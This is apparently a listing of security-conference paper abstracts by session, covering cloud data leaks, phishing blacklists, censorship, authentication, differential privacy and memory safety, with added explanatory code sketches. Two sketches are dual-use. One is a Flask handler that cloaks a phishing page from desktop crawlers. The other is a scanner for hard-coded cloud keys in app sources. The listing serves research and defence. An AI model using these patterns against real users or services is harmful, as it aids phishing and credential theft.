Why Does Your Data Leak? Uncovering the Data Leakage in Cloud from Mobile Apps

More and more mobile applications (apps for short) are using the cloud as the back-end, in particular the cloud APIs, for data storage, data analytics, message notification, and monitoring. Unfortunately, we have recently witnessed massive data leaks from the cloud, ranging from personally identifiable information to corporate secrets. In this paper, we seek to understand why such significant leaks occur and design tools to automatically identify them. To our surprise, our study reveals that lack of authentication, misuse of various keys (e.g., normal user keys and superuser keys) in authentication, or misconfiguration of user permissions in authorization are the root causes. Then, we design a set of automated program analysis techniques including obfuscation-resilient cloud API identification and string value analysis, and implement them in a tool called LeakScope to identify the potential data leakage vulnerabilities from mobile apps based on how the cloud APIs are used. Our evaluation with over 1.6 million mobile apps from the Google Play Store has uncovered 15,098 app servers managed by mainstream cloud providers such as Amazon, Google, and Microsoft that are subject to data leakage attacks. We have made responsible disclosure to each of the cloud service providers, and they have all confirmed the vulnerabilities we have identified and are actively working with the mobile app developers to patch their vulnerable services.
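
The "misused key" root cause is the easiest one to picture. Below is a deliberately simplified string scan over decompiled app sources (nothing like LeakScope's obfuscation-resilient analysis): the `AKIA` prefix is the documented shape of AWS access key IDs, while the other pattern and the path are generic illustrative assumptions.

```python
import os
import re

# Credential-shaped string constants.
PATTERNS = {
    "aws_access_key_id": re.compile(r"AKIA[0-9A-Z]{16}"),
    "generic_secret": re.compile(
        r"(?i)(api|secret)[_-]?key\s*=\s*['\"][^'\"]{16,}"
    ),
}

def scan_sources(root):
    """Yield (label, file, redacted match) for credential-looking strings."""
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.endswith((".java", ".smali", ".xml")):
                continue
            path = os.path.join(dirpath, name)
            text = open(path, errors="ignore").read()
            for label, pat in PATTERNS.items():
                for m in pat.finditer(text):
                    yield label, path, m.group(0)[:12] + "..."

for hit in scan_sources("/path/to/decompiled/apk"):   # hypothetical path
    print(hit)
```

A key shipped inside an app is, in effect, public; when it is a superuser key rather than a per-user scoped key, everyone who installs the app holds the back-end's master credential.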

Measuring and Analyzing Search Engine Poisoning of Linguistic Collisions

Misspelled keywords have become an appealing target in search poisoning, since they are less competitive to promote than the correct queries and account for a considerable amount of search traffic. Search engines have adopted several countermeasure strategies, e.g., Google applies automated corrections on queried keywords and returns search results of the corrected versions directly. However, a sophisticated class of attack, which we term linguistic-collision misspelling, can evade auto-correction and poison search results. Cybercriminals target special queries where the misspelled terms are existent words, even in other languages (e.g., “idobe”, a misspelling of the English word “adobe”, is a legitimate word in a Nigerian language).

In this paper, we perform the first large-scale analysis on linguistic-collision search poisoning attacks. In particular, we check 1.77 million misspelled search terms on Google and Baidu and analyze both English and Chinese languages, which are the top two languages used by Internet users. We leverage edit distance operations and linguistic properties to generate misspelling candidates. To more efficiently identify linguistic-collision search terms, we design a deep learning model that can improve collection rate by 2.84x compared to random sampling. Our results show that the abuse is prevalent: around 1.19% of linguistic-collision search terms on Google and Baidu have results on the first page directing to malicious websites. We also find that cybercriminals mainly target categories of gambling, drugs, and adult content. Mobile-device users disproportionately search for misspelled keywords, presumably due to small screens for input. Our work highlights this new class of search engine poisoning and provides insights to help mitigate the threat.
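
Candidate generation is simple to sketch (the lexicon below is a tiny stand-in; the paper uses full dictionaries plus a deep model to prioritize which candidates to check): enumerate edit-distance-1 variants of a popular keyword and keep those that are valid words somewhere, since exactly those survive auto-correction.

```python
import string

def edit1(word):
    """All strings one deletion/substitution/insertion/transposition away."""
    letters = string.ascii_lowercase
    splits = [(word[:i], word[i:]) for i in range(len(word) + 1)]
    dels = {l + r[1:] for l, r in splits if r}
    subs = {l + c + r[1:] for l, r in splits if r for c in letters}
    ins = {l + c + r for l, r in splits for c in letters}
    swaps = {l + r[1] + r[0] + r[2:] for l, r in splits if len(r) > 1}
    return (dels | subs | ins | swaps) - {word}

# Stand-in multilingual lexicon; any real word here evades auto-correction.
LEXICON = {"idobe", "adore", "abode", "anode"}

# Only the lexicon entries within one edit of 'adobe' are collisions.
print(sorted(edit1("adobe") & LEXICON))
```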

How Well Do My Results Generalize? Comparing Security and Privacy Survey Results from MTurk, Web, and Telephone Samples

Security and privacy researchers often rely on data collected from Amazon Mechanical Turk (MTurk) to evaluate security tools, to understand users’ privacy preferences and to measure online behavior. Yet, little is known about how well Turkers’ survey responses and performance on security- and privacy-related tasks generalizes to a broader population. This paper takes a first step toward understanding the generalizability of security and privacy user studies by comparing users’ self-reports of their security and privacy knowledge, past experiences, advice sources, and behavior across samples collected using MTurk (n=480), a census-representative web-panel (n=428), and a probabilistic telephone sample (n=3,000) statistically weighted to be accurate within 2.7% of the true prevalence in the U.S.

Surprisingly, the results suggest that: (1) MTurk responses regarding security and privacy experiences, advice sources, and knowledge are more representative of the U.S. population than are responses from the census-representative panel; (2) MTurk and general population reports of security and privacy experiences, knowledge, and advice sources are quite similar for respondents who are younger than 50 or who have some college education; and (3) respondents’ answers to the survey questions we ask are stable over time and robust to relevant, broadly-reported news events. Further, differences in responses cannot be ameliorated with simple demographic weighting, possibly because MTurk and panel participants have more internet experience compared to their demographic peers. Together, these findings lend tempered support for the generalizability of prior crowdsourced security and privacy user studies; provide context to more accurately interpret the results of such studies; and suggest rich directions for future work to mitigate experience- rather than demographic-related sample biases.

PhishFarm: A Scalable Framework for Measuring the Effectiveness of Evasion Techniques Against Browser Phishing Blacklists

Phishing attacks have reached record volumes in recent years. Simultaneously, modern phishing websites are growing in sophistication by employing diverse cloaking techniques to avoid detection by security infrastructure. In this paper, we present PhishFarm: a scalable framework for methodically testing the resilience of anti-phishing entities and browser blacklists to attackers’ evasion efforts. We use PhishFarm to deploy 2,380 live phishing sites (on new, unique, and previously-unseen .com domains) each using one of six different HTTP request filters based on real phishing kits. We reported subsets of these sites to 10 distinct anti-phishing entities and measured both the occurrence and timeliness of native blacklisting in major web browsers to gauge the effectiveness of protection ultimately extended to victim users and organizations. Our experiments revealed shortcomings in current infrastructure, which allows some phishing sites to go unnoticed by the security community while remaining accessible to victims. We found that simple cloaking techniques representative of real-world attacks—including those based on geolocation, device type, or JavaScript—were effective in reducing the likelihood of blacklisting by over 55% on average. We also discovered that blacklisting did not function as intended in popular mobile browsers (Chrome, Safari, and Firefox), which left users of these browsers particularly vulnerable to phishing attacks. Following disclosure of our findings, anti-phishing entities are now better able to detect and mitigate several cloaking techniques (including those that target mobile users), and blacklisting has also become more consistent between desktop and mobile platforms—but work remains to be done by anti-phishing entities to ensure users are adequately protected. Our PhishFarm framework is designed for continuous monitoring of the ecosystem and can be extended to test future state-of-the-art evasion techniques used by malicious websites.
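
To see why such filters defeat crawlers, here is a deliberately toy device-type cloaking handler (my illustration, not a PhishFarm artifact; the user-agent hints and page strings are placeholders): victims' mobile browsers get one page, and anything that looks like a desktop crawler gets a benign one, which is exactly what blacklist infrastructure must see through.

```python
from flask import Flask, request

app = Flask(__name__)

MOBILE_HINTS = ("iPhone", "Android")

@app.route("/")
def landing():
    ua = request.headers.get("User-Agent", "")
    # Device-type cloaking: crawlers and desktop analysts get a benign page.
    if any(h in ua for h in MOBILE_HINTS):
        return "<html>placeholder for the cloaked page</html>"
    return "<html>innocuous placeholder page</html>"

if __name__ == "__main__":
    app.run()  # local demonstration only
```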

2020 program dblp

Session #1: Anonymity and Censorship

ICLab: A Global, Longitudinal Internet Censorship Measurement Platform

Researchers have studied Internet censorship for nearly as long as attempts to censor content have taken place. Most studies have however been limited to a short period of time and/or a few countries; the few exceptions have traded off detail for breadth of coverage. Collecting enough data for a comprehensive, global, longitudinal perspective remains challenging. In this work, we present ICLab, an Internet measurement platform specialized for censorship research. It achieves a new balance between breadth of coverage and detail of measurements, by using commercial VPNs as vantage points distributed around the world. ICLab has been operated continuously since late 2016. It can currently detect DNS manipulation and TCP packet injection, and overt “block pages” however they are delivered. ICLab records and archives raw observations in detail, making retrospective analysis with new techniques possible. At every stage of processing, ICLab seeks to minimize false positives and manual validation. Within 53,906,532 measurements of individual web pages, collected by ICLab in 2017 and 2018, we observe blocking of 3,602 unique URLs in 60 countries. Using this data, we compare how different blocking techniques are deployed in different regions and/or against different types of content. Our longitudinal monitoring pinpoints changes in censorship in India and Turkey concurrent with political shifts, and our clustering techniques discover 48 previously unknown block pages. ICLab’s broad and detailed measurements also expose other forms of network interference, such as surveillance and malware injection.
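
A thumbnail of one detection signal (grossly simplified next to ICLab's pipeline, and noisy in practice because CDN geo-routing also produces disagreement): resolve the same name through the vantage point's resolver and a control resolver, and flag disjoint answers. The sketch uses the real `dnspython` resolver API; the resolver IPs are just examples.

```python
import dns.resolver   # pip install dnspython

def answers(name, resolver_ip):
    res = dns.resolver.Resolver(configure=False)
    res.nameservers = [resolver_ip]
    try:
        return {r.address for r in res.resolve(name, "A")}
    except Exception as e:
        return {f"error:{type(e).__name__}"}

def looks_manipulated(name, vantage_resolver, control_resolver="8.8.8.8"):
    """Crude signal only: a real pipeline cross-checks AS ownership,
    TLS certificates, and block-page fingerprints before concluding."""
    v, c = answers(name, vantage_resolver), answers(name, control_resolver)
    return v.isdisjoint(c), v, c

print(looks_manipulated("example.com", vantage_resolver="1.1.1.1"))
```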

High Precision Open-World Website Fingerprinting

Traffic analysis attacks to identify which web page a client is browsing, using only her packet metadata — known as website fingerprinting (WF) — have been proven effective in closed-world experiments against privacy technologies like Tor. We want to investigate their usefulness in the real open world. Several WF attacks claim to have high recall and low false positive rate, but they have only been shown to succeed against high base rate pages. We explicitly incorporate the base rate into precision and call it r-precision. Using this metric, we show that the best previous attacks have poor precision when the base rate is realistically low; we study such a scenario (r = 1000), where the maximum r-precision achieved was only 0.14. To improve r-precision, we propose three novel classes of precision optimizers that can be applied to any classifier to increase precision. For r = 1000, our best optimized classifier can achieve a precision of at least 0.86, representing a precision increase by more than 6 times. For the first time, we show a WF classifier that can scale to any open world set size. We also investigate the use of precise classifiers to tackle realistic objectives in website fingerprinting, including different types of websites, identification of sensitive clients, and defeating website fingerprinting defenses.
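
The base-rate adjustment is worth writing out (my formulation of the idea; the paper's exact definition may differ in details): with true-positive rate TPR and false-positive rate FPR measured on balanced data, and r non-monitored page visits for every monitored one in the wild, expected precision becomes TPR / (TPR + r * FPR).

```python
def r_precision(tpr: float, fpr: float, r: float) -> float:
    """Precision once the open-world base rate is applied: for every
    monitored-page visit there are r unmonitored ones, so false positives
    weigh r times as heavily as in a balanced experiment."""
    return tpr / (tpr + r * fpr)

# A classifier that looks great on balanced data (99% TPR, 1% FPR)...
print(r_precision(0.99, 0.01, r=1))      # ~0.99 in a balanced test
print(r_precision(0.99, 0.01, r=1000))   # ~0.09 at a realistic base rate
```

The second line is the whole argument in miniature: at r = 1000 even a 1% false-positive rate swamps the true positives, which is why the paper's optimizers trade recall for precision.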

Breaking and (Partially) Fixing Provably Secure Onion Routing

After several years of research on onion routing, Camenisch and Lysyanskaya, in an attempt at rigorous analysis, defined an ideal functionality in the universal composability model, together with properties that protocols have to meet to achieve provable security. A whole family of systems based their security proofs on this work. However, analyzing HORNET and Sphinx, two instances from this family, we show that this proof strategy is broken. We discover a previously unknown vulnerability that breaks anonymity completely, and explain a known one. Both should not exist if privacy is proven correctly. In this work, we analyze and fix the proof strategy used for this family of systems. After proving the efficacy of the ideal functionality, we show how the original properties are flawed and suggest improved, effective properties in their place. Finally, we discover another common mistake in the proofs. We demonstrate how to avoid it by showing our improved properties for one protocol, thus partially fixing the family of provably secure onion routing protocols.

Are Anonymity-Seekers Just Like Everybody Else? An Analysis of Contributions to Wikipedia from Tor

User-generated content sites routinely block contributions from users of privacy-enhancing proxies like Tor because of a perception that proxies are a source of vandalism, spam, and abuse. Although these blocks might be effective, collateral damage in the form of unrealized valuable contributions from anonymity seekers is invisible. One of the largest and most important user-generated content sites, Wikipedia, has attempted to block contributions from Tor users since as early as 2005. We demonstrate that these blocks have been imperfect and that thousands of attempts to edit on Wikipedia through Tor have been successful. We draw upon several data sources and analytical techniques to measure and describe the history of Tor editing on Wikipedia over time and to compare contributions from Tor users to those from other groups of Wikipedia users. Our analysis suggests that although Tor users who slip through Wikipedia’s ban contribute content that is more likely to be reverted and to revert others, their contributions are otherwise similar in quality to those from other unregistered participants and to the initial contributions of registered users.

Session #2: Authentication

Gesture Authentication for Smartphones: Evaluation of Gesture Password Selection Policies

Touchscreen gestures are attracting research attention as an authentication method. While studies have showcased their usability, it has proven more complex to determine, let alone enhance, their security. Problems stem both from the small scale of current data sets and the fact that gestures are matched imprecisely – by a distance metric. This makes it challenging to assess entropy with traditional algorithms. To address these problems, we captured a large set of gesture passwords (N=2594) from crowd workers, and developed a security assessment framework that can calculate partial guessing entropy estimates, and generate dictionaries that crack 23.13% or more gestures in online attacks (within 20 guesses). To improve the entropy of gesture passwords, we designed novel blacklist and lexical policies to, respectively, restrict and inspire gesture creation. We close by validating both our security assessment framework and policies in a new crowd-sourced study (N=4000). Our blacklists increase entropy and resistance to dictionary based guessing attacks.

Is FIDO2 the Kingslayer of User Authentication? A Comparative Usability Study of FIDO2 Passwordless Authentication

The newest contender for succeeding passwords as the incumbent web authentication scheme is the FIDO2 standard. Jointly developed and backed by the FIDO Alliance and the W3C, FIDO2 has found support in virtually every browser, finds increasing support by service providers, and has adoption beyond browser software on its way. While it supports MFA and 2FA, its single-factor, passwordless authentication with security tokens has received the bulk of attention and was hailed by its supporters and the media as the solution that will replace text-passwords on the web. Despite its obvious security and deployability benefits—a setting that no prior solution had in this strong combination—the paradigm shift from a familiar knowledge factor to purely a possession factor raises questions about the acceptance of passwordless authentication by end-users. This paper presents the first large-scale lab study of FIDO2 single-factor authentication to collect insights about end-users’ perception, acceptance, and concerns about passwordless authentication. Through hands-on tasks our participants gather first-hand experience with passwordless authentication using a security key, which they afterwards reflect on in a survey. Our results show that users are willing to accept a direct replacement of text-based passwords with a security key for single-factor authentication. That is an encouraging result in the quest to replace passwords. But, our results also identify new concerns that can potentially hinder the widespread adoption of FIDO2 passwordless authentication. In order to mitigate these factors, we derive concrete recommendations to try to help in the ongoing proliferation of passwordless authentication on the web.

This PIN Can Be Easily Guessed: Analyzing the Security of Smartphone Unlock PINs

In this paper, we provide the first comprehensive study of user-chosen 4- and 6-digit PINs (n = 1220) collected on smartphones with participants being explicitly primed for device unlocking. We find that against a throttled attacker (with 10, 30, or 100 guesses, matching the smartphone unlock setting), using 6-digit PINs instead of 4-digit PINs provides little to no increase in security, and surprisingly may even decrease security. We also study the effects of blacklists, where a set of “easy to guess” PINs is disallowed during selection. Two such blacklists are in use today by iOS, for 4-digits (274 PINs) as well as 6-digits (2910 PINs). We extracted both blacklists and compared them with four other blacklists, including a small 4-digit (27 PINs), a large 4-digit (2740 PINs), and two placebo blacklists for 4- and 6-digit PINs that always excluded the first-choice PIN. We find that the relatively small blacklists in use today by iOS offer little or no benefit against a throttled guessing attack. Security gains are only observed when the blacklists are much larger, which in turn comes at the cost of increased user frustration. Our analysis suggests that a blacklist at about 10% of the PIN space may provide the best balance between usability and security.
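
The throttled-attacker evaluation boils down to one computation: how many users fall to the q most popular PINs, with or without a blacklist in force. A toy version (the "attacker knows the observed distribution" assumption and all names are mine, not the paper's code):

```python
from collections import Counter

def cracked_fraction(pins, q):
    """Fraction of PINs an attacker cracks within q guesses (q = 10, 30,
    or 100 in the smartphone unlock setting), assuming the attacker
    guesses the q most popular PINs in the observed distribution."""
    freq = Counter(pins)
    top_q = sum(count for _, count in freq.most_common(q))
    return top_q / sum(freq.values())

# With a blacklist in force, users cannot pick blacklisted PINs and a
# rational attacker skips them too; re-running the same computation on
# the post-blacklist distribution shows the (often small) security gain.
```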

Session #2: Machine Learning and Privacy

The Value of Collaboration in Convex Machine Learning with Differential Privacy

In this paper, we apply machine learning to distributed private data owned by multiple data owners, entities with access to non-overlapping training datasets. We use noisy, differentially-private gradients to minimize the fitness cost of the machine learning model using stochastic gradient descent. We quantify the quality of the trained model, using the fitness cost, as a function of privacy budget and size of the distributed datasets to capture the trade-off between privacy and utility in machine learning. This way, we can predict the outcome of collaboration among privacy-aware data owners prior to executing potentially computationally-expensive machine learning algorithms. Particularly, we show that the difference between the fitness of the trained machine learning model using differentially-private gradient queries and the fitness of the trained machine learning model in the absence of any privacy concerns is inversely proportional to the size of the training datasets squared and the privacy budget squared. We successfully validate the performance prediction with the actual performance of the proposed privacy-aware learning algorithms, applied to: financial datasets for determining interest rates of loans using regression; and detecting credit card frauds using support vector machines.
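
Restating the paper’s central scaling result in symbols (notation mine; C absorbs model- and data-dependent constants): with fitness cost F, training-set size N, and privacy budget ε, the abstract’s claim reads roughly as

```latex
F(\hat{\theta}_{\mathrm{DP}}) - F(\hat{\theta}) \;\approx\; \frac{C}{N^{2}\,\varepsilon^{2}}
```

so doubling either the data or the budget cuts the privacy-induced fitness gap to a quarter, which is what allows the value of a collaboration to be predicted before any expensive training runs.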

Automatically Detecting Bystanders in Photos to Reduce Privacy Risks

Photographs taken in public places often contain bystanders - people who are not the main subject of a photo. These photos, when shared online, can reach a large number of viewers and potentially undermine the bystanders’ privacy. Furthermore, recent developments in computer vision and machine learning can be used by online platforms to identify and track individuals. To combat this problem, researchers have proposed technical solutions that require bystanders to be proactive and use specific devices or applications to broadcast their privacy policy and identifying information to locate them in an image. We explore the prospect of a different approach – identifying bystanders solely based on the visual information present in an image. Through an online user study, we catalog the rationale humans use to classify subjects and bystanders in an image, and systematically validate a set of intuitive concepts (such as intentionally posing for a photo) that can be used to automatically identify bystanders. Using image data, we infer those concepts and then use them to train several classifier models. We extensively evaluate the models and compare them with human raters. On our initial dataset, with a 10-fold cross validation, our best model achieves a mean detection accuracy of 93% for images when human raters have 100% agreement on the class label and 80% when the agreement is only 67%. We validate this model on a completely different dataset and achieve similar results, demonstrating that our model generalizes well.

CrypTFlow : Secure TensorFlow Inference

We present CrypTFlow, a first-of-its-kind system that converts TensorFlow inference code into Secure Multi-party Computation (MPC) protocols at the push of a button. To do this, we build three components. Our first component, Athos, is an end-to-end compiler from TensorFlow to a variety of semi-honest MPC protocols. The second component, Porthos, is an improved semi-honest 3-party protocol that provides significant speedups for TensorFlow-like applications. Finally, to provide malicious secure MPC protocols, our third component, Aramis, is a novel technique that uses hardware with integrity guarantees to convert any semi-honest MPC protocol into an MPC protocol that provides malicious security. The malicious security of the protocols output by Aramis relies on integrity of the hardware and semi-honest security of MPC. Moreover, our system matches the inference accuracy of plaintext TensorFlow. We experimentally demonstrate the power of our system by showing the secure inference of real-world neural networks such as ResNet50 and DenseNet121 over the ImageNet dataset with running times of about 30 seconds for semi-honest security and under two minutes for malicious security. Prior work in the area of secure inference has been limited to semi-honest security of small networks over tiny datasets such as MNIST or CIFAR. Even on MNIST/CIFAR, CrypTFlow outperforms prior work.

Session #3: Differential Privacy

SoK: Differential Privacy as a Causal Property

We present formal models of the associative and causal views of differential privacy. Under the associative view, the possibility of dependencies between data points precludes a simple statement of differential privacy’s guarantee as conditioning upon a single changed data point. However, we show that a simple characterization of differential privacy as limiting the effect of a single data point does exist under the causal view, without independence assumptions about data points. We believe this characterization resolves disagreement and confusion in prior work about the consequences of differential privacy. The associative view needing assumptions boils down to the contrapositive of the maxim that correlation doesn’t imply causation: differential privacy ensuring a lack of (strong) causation does not imply a lack of (strong) association. Our characterization also opens up the possibility of applying results from statistics, experimental design, and science about causation while studying differential privacy.
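
For readers who want the guarantee under discussion in concrete form, here is a minimal Laplace-mechanism sketch (the standard textbook construction, not code from the paper). The causal reading of the SoK: intervening on one record shifts the output distribution by at most a factor of e^ε, with no independence assumption on the other records.

```python
import numpy as np

def laplace_mechanism(data, epsilon, sensitivity=1.0):
    """epsilon-DP release of a counting/sum-style query: add Laplace
    noise with scale sensitivity / epsilon."""
    return sum(data) + np.random.laplace(scale=sensitivity / epsilon)

# Changing (causally intervening on) a single data point moves the true
# answer by at most `sensitivity`, so the two output distributions differ
# by at most a factor exp(epsilon), however the remaining records happen
# to be correlated with each other.
d1 = [0, 1, 1, 0, 1]
d2 = [1, 1, 1, 0, 1]  # one record changed
print(laplace_mechanism(d1, 0.5), laplace_mechanism(d2, 0.5))
```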

Private Resource Allocators and Their Applications

This paper introduces a new cryptographic primitive called a private resource allocator (PRA) that can be used to allocate resources (e.g., network bandwidth, CPUs) to a set of clients without revealing to the clients whether any other clients received resources. We give several constructions of PRAs that provide guarantees ranging from information-theoretic to differential privacy. PRAs are useful in preventing a new class of attacks that we call allocation-based side-channel attacks. These attacks can be used, for example, to break the privacy guarantees of anonymous messaging systems that were designed specifically to defend against side-channel and traffic analysis attacks. Our implementation of PRAs in Alpenhorn, which is a recent anonymous messaging system, shows that PRAs increase the network resources required to start a conversation by up to 16× (can be made as low as 4× in some cases), but add no overhead once the conversation has been established.

Towards Effective Differential Privacy Communication for Users’ Data Sharing Decision and Comprehension

Differential privacy protects an individual’s privacy by perturbing data on an aggregated level (DP) or individual level (LDP). We report four online human-subject experiments investigating the effects of using different approaches to communicate differential privacy techniques to laypersons in a health app data collection setting. Experiments 1 and 2 investigated participants’ data disclosure decisions for low-sensitive and high-sensitive personal information when given different DP or LDP descriptions. Experiments 3 and 4 uncovered reasons behind participants’ data sharing decisions, and examined participants’ subjective and objective comprehensions of these DP or LDP descriptions. When shown descriptions that explain the implications instead of the definition/processes of the DP or LDP technique, participants demonstrated better comprehension and showed more willingness to share information with LDP than with DP, indicating their understanding of LDP’s stronger privacy guarantee compared with DP.

A Programming Framework for Differential Privacy with Accuracy Concentration Bounds

Differential privacy offers a formal framework for reasoning about privacy and accuracy of computations on private data. It also offers a rich set of building blocks for constructing private data analyses. When carefully calibrated, these analyses simultaneously guarantee the privacy of the individuals contributing their data, and the accuracy of the data analyses results, inferring useful properties about the population. The compositional nature of differential privacy has motivated the design and implementation of several programming languages aimed at helping a data analyst in programming differentially private analyses. However, most of the programming languages for differential privacy proposed so far provide support for reasoning about privacy but not for reasoning about the accuracy of data analyses. To overcome this limitation, in this work we present DPella, a programming framework providing data analysts with support for reasoning about privacy, accuracy and their trade-offs. The distinguishing feature of DPella is a novel component which statically tracks the accuracy of different data analyses. In order to make tighter accuracy estimations, this component leverages taint analysis for automatically inferring statistical independence of the different noise quantities added for guaranteeing privacy. We evaluate our approach by implementing several classical queries from the literature and showing how data analysts can figure out the best manner to calibrate privacy to meet the accuracy requirements.
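
The accuracy side of DPella's bookkeeping is easy to illustrate for the single-query base case, where the Laplace tail bound is exact (the framework's real contribution, composing such bounds across queries using independence inferred by taint analysis, is not reproduced here):

```python
import math

def laplace_error_bound(epsilon, beta, sensitivity=1.0):
    """Smallest alpha with P(|Laplace(sensitivity/epsilon)| > alpha) <= beta,
    using the exact tail P(|Lap(b)| > a) = exp(-a/b)."""
    b = sensitivity / epsilon
    return b * math.log(1.0 / beta)

# A sensitivity-1 counting query at epsilon = 0.1 is within ~30 of the
# truth with probability 95%:
print(laplace_error_bound(0.1, 0.05))  # ~29.96
```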

Session #4: Memory Safety

xMP: Selective Memory Protection for Kernel and User Space

Attackers leverage memory corruption vulnerabilities to establish primitives for reading from or writing to the address space of a vulnerable process. These primitives form the foundation for code-reuse and data-oriented attacks. While various defenses against the former class of attacks have proven effective, mitigation of the latter remains an open problem. In this paper, we identify various shortcomings of the x86 architecture regarding memory isolation, and leverage virtualization to build an effective defense against data-oriented attacks. Our approach, called xMP, provides (in-guest) selective memory protection primitives that allow VMs to isolate sensitive data in user or kernel space in disjoint xMP domains. We interface the Xen altp2m subsystem with the Linux memory management system, lending VMs the flexibility to define custom policies. Contrary to conventional approaches, xMP takes advantage of virtualization extensions, but after initialization, it does not require any hypervisor intervention. To ensure the integrity of in-kernel management information and pointers to sensitive data within isolated domains, xMP protects pointers with HMACs bound to an immutable context, so that integrity validation succeeds only in the right context. We have applied xMP to protect the page tables and process credentials of the Linux kernel, as well as sensitive data in various user-space applications. Overall, our evaluation shows that xMP introduces minimal overhead for real-world workloads and applications, and offers effective protection against data-oriented attacks.

MarkUs: Drop-in use-after-free prevention for low-level languages

Use-after-free vulnerabilities have plagued software written in low-level languages, such as C and C++, becoming one of the most frequent classes of exploited software bugs. Attackers identify code paths where data is manually freed by the programmer, but later incorrectly reused, and take advantage by reallocating the data to themselves. They then alter the data behind the program’s back, using the erroneous reuse to gain control of the application and, potentially, the system. While a variety of techniques have been developed to deal with these vulnerabilities, they often have unacceptably high performance or memory overheads, especially in the worst case. We have designed MarkUs, a memory allocator that prevents this form of attack at low overhead, sufficient for deployment in real software, even under allocation- and memory-intensive scenarios. We prevent use-after-free attacks by quarantining data freed by the programmer and forbidding its reallocation until we are sure that there are no dangling pointers targeting it. To identify these we traverse live-objects accessible from registers and memory, marking those we encounter, to check whether quarantined data is accessible from any currently allocated location. Unlike garbage collection, which is unsafe in C and C++, MarkUs ensures safety by only freeing data that is both quarantined by the programmer and has no identifiable dangling pointers. The information provided by the programmer’s allocations and frees further allows us to optimise the process by freeing physical addresses early for large objects, specialising analysis for small objects, and only performing marking when sufficient data is in quarantine. Using MarkUs, we reduce the overheads of temporal safety in low-level languages to 1.1× on average for SPEC CPU2006, with a maximum slowdown of only 2×, vastly improving upon the state-of-the-art.
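
A toy model of the quarantine-and-mark idea may help (a Python stand-in purely for illustration; MarkUs itself is a drop-in C/C++ allocator that scans real registers, stacks, and heap words):

```python
class QuarantiningAllocator:
    """Toy sketch of quarantine-until-provably-unreachable: free() never
    returns a block to the free list directly; a mark phase releases a
    quarantined block only if no live word still holds its address."""

    def __init__(self):
        self.next_addr, self.free_list, self.quarantine = 0x1000, [], set()

    def malloc(self):
        if self.free_list:
            return self.free_list.pop()
        addr, self.next_addr = self.next_addr, self.next_addr + 0x10
        return addr

    def free(self, addr):
        self.quarantine.add(addr)  # not reusable yet

    def sweep(self, live_words):
        """`live_words` stands in for every pointer-sized value reachable
        from registers, stacks, and the heap (the mark traversal)."""
        dangling = self.quarantine & set(live_words)
        self.free_list.extend(self.quarantine - dangling)  # safe to reuse
        self.quarantine = dangling  # still referenced: keep quarantined
```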

SEIMI: Efficient and Secure SMAP-Enabled Intra-process Memory Isolation

Memory-corruption attacks such as code-reuse attacks and data-only attacks have been a key threat to systems security. To counter these threats, researchers have proposed a variety of defenses, including control-flow integrity (CFI), code-pointer integrity (CPI), and code (re-)randomization. All of them, to be effective, require a security primitive—intra-process protection of confidentiality and/or integrity for sensitive data (such as CFI’s shadow stack and CPI’s safe region). In this paper, we propose SEIMI, a highly efficient intra-process memory isolation technique for memory-corruption defenses to protect their sensitive data. The core of SEIMI is to use the efficient Supervisor-mode Access Prevention (SMAP), a hardware feature that is originally used for preventing the kernel from accessing the user space, to achieve intra-process memory isolation. To leverage SMAP, SEIMI creatively executes the user code in the privileged mode. In addition to enabling the new design of the SMAP-based memory isolation, we further develop multiple new techniques to ensure secure escalation of user code, e.g., using the descriptor caches to capture the potential segment operations and configuring the Virtual Machine Control Structure (VMCS) to invalidate the execution result of the control registers related operations. Extensive experimental results show that SEIMI outperforms existing isolation mechanisms, including both the Memory Protection Keys (MPK) based scheme and the Memory Protection Extensions (MPX) based scheme, while providing secure memory isolation.

Cornucopia: Temporal Safety for CHERI Heaps

Use-after-free violations of temporal memory safety continue to plague software systems, underpinning many high-impact exploits. The CHERI capability system shows great promise in achieving C and C++ language spatial memory safety, preventing out-of-bounds accesses. Enforcing language-level temporal safety on CHERI requires capability revocation, traditionally achieved either via table lookups (avoided for performance in the CHERI design) or by identifying capabilities in memory to revoke them (similar to a garbage-collector sweep). CHERIvoke, a prior feasibility study, suggested that CHERI’s tagged capabilities could make this latter strategy viable, but modeled only architectural limits and did not consider the full implementation or evaluation of the approach. Cornucopia is a lightweight capability revocation system for CHERI that implements non-probabilistic C/C++ temporal memory safety for standard heap allocations. It extends the CheriBSD virtual-memory subsystem to track capability flow through memory and provides a concurrent kernel-resident revocation service that is amenable to multi-processor and hardware acceleration. We demonstrate an average overhead of less than 2% and a worst-case of 8.9% for concurrent revocation on compatible SPEC CPU2006 benchmarks on a multi-core CHERI CPU on FPGA, and we validate Cornucopia against the Juliet test suite’s corpus of temporally unsafe programs. We test its compatibility with a large corpus of C programs by using a revoking allocator as the system allocator while booting multi-user CheriBSD. Cornucopia is a viable strategy for always-on temporal heap memory safety, suitable for production environments.

Session #4: Computing and Society

The Many Kinds of Creepware Used for Interpersonal Attacks

Technology increasingly facilitates interpersonal attacks such as stalking, abuse, and other forms of harassment. While prior studies have examined the ecosystem of software designed for stalking, there exists an unstudied, larger landscape of apps—what we call creepware—used for interpersonal attacks. In this paper, we initiate a study of creepware using access to a dataset detailing the mobile apps installed on over 50 million Android devices. We develop a new algorithm, CreepRank, that uses the principle of guilt by association to help surface previously unknown examples of creepware, which we then characterize through a combination of quantitative and qualitative methods. We discovered apps used for harassment, impersonation, fraud, information theft, concealment, and even apps that purport to defend victims against such threats. As a result of our work, the Google Play Store has already removed hundreds of apps for policy violations. More broadly, our findings and techniques improve understanding of the creepware ecosystem, and will inform future efforts that aim to mitigate interpersonal attacks.

How Not to Prove Your Election Outcome

The Scytl/SwissPost e-voting solution was intended to provide complete verifiability for Swiss government elections. We show failures in both individual verifiability and universal verifiability (as defined in Swiss Federal Ordinance 161.116), based on mistaken implementations of cryptographic components. These failures allow for the construction of “proofs” of an accurate election outcome that pass verification even though the votes have been manipulated. Using sophisticated cryptographic protocols without a proper consideration of what properties they offer, and under which conditions, can introduce opportunities for undetectable fraud even though the system appears to allow verification of the outcome. Our findings are immediately relevant to systems in use in Switzerland and Australia, and probably also elsewhere.

A Security Analysis of the Facebook Ad Library

